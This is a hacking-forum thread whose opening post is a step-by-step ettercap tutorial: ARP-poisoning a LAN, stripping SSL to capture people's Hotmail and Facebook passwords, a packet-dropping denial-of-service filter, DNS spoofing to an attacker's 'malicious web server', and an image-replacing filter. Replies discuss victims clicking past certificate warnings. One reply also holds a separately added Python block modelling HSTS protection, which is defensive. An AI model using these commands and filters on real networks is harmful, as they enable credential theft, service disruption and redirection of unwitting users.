Ettercap Man In The Middle Attack + SSL Strip #1
Ettercap Man In The Middle Attack + SSL strip

Only test this on your home network, nowhere else. This guide is more of a reference for launching a man in the middle attack to view the traffic of victims on the network using ettercap along with sslstrip to strip out the important encrypted HTTP traffic. I have done this on wired and wireless LANs using Backtrack 5.

To begin we want to enable packet forwarding with this command:

echo 1 > /proc/sys/net/ipv4/ip_forward

Then cat the file to see whether it is enabled or not. An output of 1 means enabled and 0 means not enabled.

cat /proc/sys/net/ipv4/ip_forward

We will now edit our etter.conf configuration file to use iptables. In Backtrack the file is located at /etc/etter.conf
Uncomment the two commented lines following the statement "if you use iptables" by removing the two bottom comment hashes you see below (the two shown in red in the original post), but make sure to leave the one beside the words "if you use iptables":

#if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

In the same file also change ec_uid and ec_gid numbers to zero so Ettercap runs as admin.

[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default



Now use this iptables command to adjust the NAT table so that TCP traffic for port 80 is redirected to port 8080:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Once we have scanned the network for targets and are aware of which IP addresses belong to what, we can begin the poisoning by becoming man in the middle. The following will start ettercap using a range of IP addresses along with the autoadd plugin, which means victims who join the network or reconnect to it after you began the scan will be poisoned as well. In this example 192.168.1.1 is the router and ettercap will poison targets up to 192.168.1.5. Also, if you are on a wireless network, all you have to do is tell ettercap to use your wireless interface with -i wlan0; wlan0 is my wireless interface.

sudo ettercap -Tq -M arp:remote /192.168.1.1-5/ -P autoadd
Or, less specifically (this poisons everyone in the subnet, but be careful, it can bring a network to a crawl):
ettercap -TqM ARP:REMOTE // //

Now tell sslstrip to listen (-l) on port 8080:

sslstrip -a -l 8080

Now watch people's Hotmail, Facebook and any other passwords that are supposedly protected by SSL roll in as they log in. Ettercap will display the output. Now let's dig deeper and manipulate people's packets as they are routed through our computer.


DOS Attacking with Ettercap


First off, always re-enable packet forwarding, because by default it will turn off when you stop an Ettercap poison. Here is the command:


echo 1 > /proc/sys/net/ipv4/ip_forward

Now let's do a DOS attack with ettercap. The first thing we want to do is create a file with instructions to drop packets from and to a target host. Make a file called dos.eft
Put these lines of code in it, but make sure to change both 'Target IP' fields to that of your victim.

# replace both 'Target IP' strings with the victim's address before compiling
if (ip.src == 'Target IP' || ip.dst == 'Target IP') {
    drop();
    kill();
    msg("Packet Dropped\n");
}


Go to the directory you saved your file/script in and compile it into an ettercap filter with this command:

etterfilter dos.eft -o dos.ef

Lastly we become man in the middle.
-F specifies what filter we want to use. In this case it's dos.ef
I was targeting 192.168.1.112 so I chose it for this example:

ettercap -T -q -F dos.ef -M ARP /192.168.1.112/ // -i (network interface)

You should see Ettercap displaying lots of "Packet Dropped" messages. ;-)


DNS Spoofing
(Redirecting victim to sites of our choosing with Ettercap)

Now let's redirect our victim to websites of our choosing. First open a new console and change to the directory that holds our DNS configuration file:

/usr/share/ettercap

Enter the following command to open the configuration file so we can edit it. I use gedit to edit it, but you can use many other programs such as kedit:

gedit etter.dns

Now see the line that says

microsoft.com A 198.182.196.56

That line will redirect the victim to 198.182.196.56 if they attempt to visit microsoft.com.

I will give you an example by showing how I can redirect the victim to my own malicious web server running on my IP address (192.168.1.118) if they attempt to visit, let's say, www.facebook.com. This example also uses a wildcard (*). We do this by adding the following line:

*.facebook.com A 192.168.1.118

Save it. Now we can issue the actual command that begins Ettercap and uses the DNS spoofing add-on:

ettercap -T -q -M arp:remote -P dns_spoof //

or if we want to target a specific victim IP address use this:

ettercap -i yourinterface -T -q -P dns_spoof -M ARP /herevictimslocalip/ //

Leave that running. The output that ettercap displays will clearly notify you as people are redirected.


Change pictures the victim sees as they browse the web

(using an Ettercap filter of course)


OK, in this section I will teach you how to work with filters in Ettercap and ultimately change the pictures people see in their browser to ones we have selected. To create your own filters you need to learn the basics of how programming languages work, but for this example I will give you one that I got from the helpful hackers at greyhat security.

Create/edit a new file using the following command:

gedit filter.pic

Copy and paste the following into it. But you must change the image URL (the text in red in the original post) to the URL of your own images that you have uploaded using your favorite image uploader such as tinypic.com or imageshack.com

# outbound requests: remove Accept-Encoding so the server replies uncompressed
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        msg("Modified Accept-Encoding!\n");
    }
}

# inbound responses: rewrite every img src to the chosen picture
if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
    replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
    msg("Replaced the picture.\n");
}

if (ip.proto == UDP && udp.src == 80) {
    replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
    replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
    msg("Replaced the picture.\n");
}

Save and close. In that same console session, run the following command to turn the code into a filter that is readable by Ettercap:


etterfilter filter.pic -o filter.ef

Now we finally issue the Ettercap command that begins the MITM attack and uses the picture filter that we have created:

sudo ettercap -T -q -F filter.ef -M arp:remote // -P autoadd

----------------------------------------------------------------------

Note: Remember to enable packet forwarding before using any of the attacks I mentioned in this guide. It was mentioned in the first tutorial (the SSL strip tutorial), but here is the command again:

echo 1 > /proc/sys/net/ipv4/ip_forward

A closed mouth says nothing wrong, A closed mind does nothing right.


RE: Ettercap Man In The MIddle Attack + SSL Strip #2
Awesome, thanks!!!
Staff will never ever ask you for your personal information.
We know everything about you anyway.


RE: Ettercap Man In The MIddle Attack + SSL Strip #3
How do I open ettercap and why should I use SSL strip?

:rofl:


RE: Ettercap Man In The MIddle Attack + SSL Strip #4
If we don't use ssl-strip, the browser will say there is something wrong with the certificates..
:8-s:
DOS Attacking with Ettercap ---> I will try this.... thanks :thumbs:


RE: Ettercap Man In The MIddle Attack + SSL Strip #5
(04-16-2011, 01:38 AM)lagann Wrote: If we don't use ssl-strip, the browser will say there is something wrong with the certificates..
:8-s:
DOS Attacking with Ettercap ---> I will try this.... thanks :thumbs:

NP, glad you like it. I can add more to this guide too, like how to redirect victims to different websites of your choosing or how to change all the pictures the victim sees as they browse the web, if you want?

By the way, the victim's computer will still get an "are you sure you want to proceed anyway" message even if you use ssl strip. We can successfully strip the SSL out, but we still don't have the legit SSL certificate. There are ways to make your own legit ones so that message does not prompt the user, though, I think.

The message differs depending on what browser the victim is using; nevertheless this works because most people will just click proceed anyway. Just make sure to use Backtrack, not another distro, for this guide anyway.

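The "proceed anyway" warning discussed in this reply is exactly what HSTS (RFC 6797) removes from the equation: a browser that has cached a Strict-Transport-Security policy from an earlier https visit rewrites a stripped http:// link to https:// itself, so the downgrade never reaches the wire, and the attacker's only remaining move is the certificate warning the reply mentions. This is an added example that is not from the thread; the response header blocks and host names are constructed, and the store models only the parts of browser HSTS behaviour relevant here (secure-transport-only, includeSubDomains, max-age=0 eviction).

```python
# Constructed response header blocks (not captured from any real site).
RESPONSE_WITH_HSTS = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "\r\n"
)
RESPONSE_WITHOUT_HSTS = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"


def parse_hsts(raw_response):
    """Return {'max_age', 'include_subdomains'} from a Strict-Transport-Security header, or None.
    max-age is mandatory (RFC 6797 section 6.1); a header without it is ignored, as browsers do."""
    for line in raw_response.split("\r\n"):
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "strict-transport-security":
            continue
        directives = [d.strip().lower() for d in value.split(";") if d.strip()]
        ages = [d.split("=", 1)[1].strip('"') for d in directives if d.startswith("max-age=")]
        if not ages or not ages[0].isdigit():
            return None
        return {"max_age": int(ages[0]), "include_subdomains": "includesubdomains" in directives}
    return None


def build_hsts_store(observations):
    """Build a browser-style HSTS cache {host: policy} from (host, scheme, raw_response) tuples.
    Only a response received over https may set a policy (RFC 6797 section 8.1): sslstrip works
    precisely by keeping the victim on http so that first https visit never happens."""
    store = {}
    for host, scheme, raw in observations:
        policy = parse_hsts(raw)
        if scheme != "https" or policy is None:
            continue
        if policy["max_age"] == 0:
            store.pop(host.lower(), None)  # max-age=0 tells the browser to forget the host
        else:
            store[host.lower()] = policy
    return store


def is_downgrade_blocked(store, host):
    """True when a browser holding this cache would upgrade http://host to https:// on its own,
    so a link rewritten by sslstrip never leaves the browser as plain http."""
    labels = host.lower().split(".")
    for i in range(len(labels)):
        policy = store.get(".".join(labels[i:]))
        if policy and (i == 0 or policy["include_subdomains"]):
            return True
    return False
```

Sites that want protection even before the first https visit ship their host in the browsers' preload list, which the store above would model as pre-populated entries.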

RE: Ettercap Man In The MIddle Attack + SSL Strip #6
(04-16-2011, 12:16 AM)enc0de Wrote: How do I open ettercap and why should I use SSL strip?

:rofl:

Hey, I was just kidding, but very nice tutorial. 5 stars and a rep. Keep up the good work.


RE: Ettercap Man In The MIddle Attack + SSL Strip #7
(04-16-2011, 04:20 PM)enc0de Wrote:
(04-16-2011, 12:16 AM)enc0de Wrote: How do I open ettercap and why should I use SSL strip?

:rofl:

Hey, I was just kidding, but very nice tutorial. 5 stars and a rep. Keep up the good work.

Hahaha yeah, I figured, man :P. Thanks for the rep too! You will be repaid double once I accumulate some more, btw ;)


RE: Ettercap Man In The MIddle Attack + SSL Strip #8
(04-16-2011, 03:56 PM).LiT Wrote:
(04-16-2011, 01:38 AM)lagann Wrote: If we don't use ssl-strip, the browser will say there is something wrong with the certificates..
:8-s:
DOS Attacking with Ettercap ---> I will try this.... thanks :thumbs:

NP, glad you like it. I can add more to this guide too, like how to redirect victims to different websites of your choosing or how to change all the pictures the victim sees as they browse the web, if you want?

By the way, the victim's computer will still get an "are you sure you want to proceed anyway" message even if you use ssl strip. We can successfully strip the SSL out, but we still don't have the legit SSL certificate. There are ways to make your own legit ones so that message does not prompt the user, though, I think.

The message differs depending on what browser the victim is using; nevertheless this works because most people will just click proceed anyway. Just make sure to use Backtrack, not another distro, for this guide anyway.

:rofl:.... I'm not saying that I use your ssl-strip ^_^' ...
but I like your DOS attacks :thumbs:



RE: Ettercap Man In The MIddle Attack + SSL Strip #9
I think that ettercap doesn't work on client-isolation-enabled APs/hotspots. Please correct me if I am wrong. Neither does wireshark. I can see only my own data.... but I found I can urlsnarf & driftnet by using airodump captured packets. And tcpdump seems to work too.. but not too sure about it, just used tcpdump a couple of days ago.. need to learn more about it.
YEAH YEAH.. GIVE ME NEGATIVE REP FOR SAYING TRUTH... BUT ANYWAY WHO CARES!!!. I AM WHO I AM...REPS DO NOT MATTER TO ME.. GIVE ME 1000 -ve REPS, but IF MY POST IS GOOD THEN READERS WILL KNOW


RE: Ettercap Man In The MIddle Attack + SSL Strip #10
(06-02-2011, 05:59 PM)deathknight Wrote: I think that ettercap doesn't work on client-isolation-enabled APs/hotspots. Please correct me if I am wrong. Neither does wireshark. I can see only my own data.... but I found I can urlsnarf & driftnet by using airodump captured packets. And tcpdump seems to work too.. but not too sure about it, just used tcpdump a couple of days ago.. need to learn more about it.

This is tried and tested using Backtrack on wired LANs. Not wireless. Refer to Coder-San's wireless sniffing thread for that.
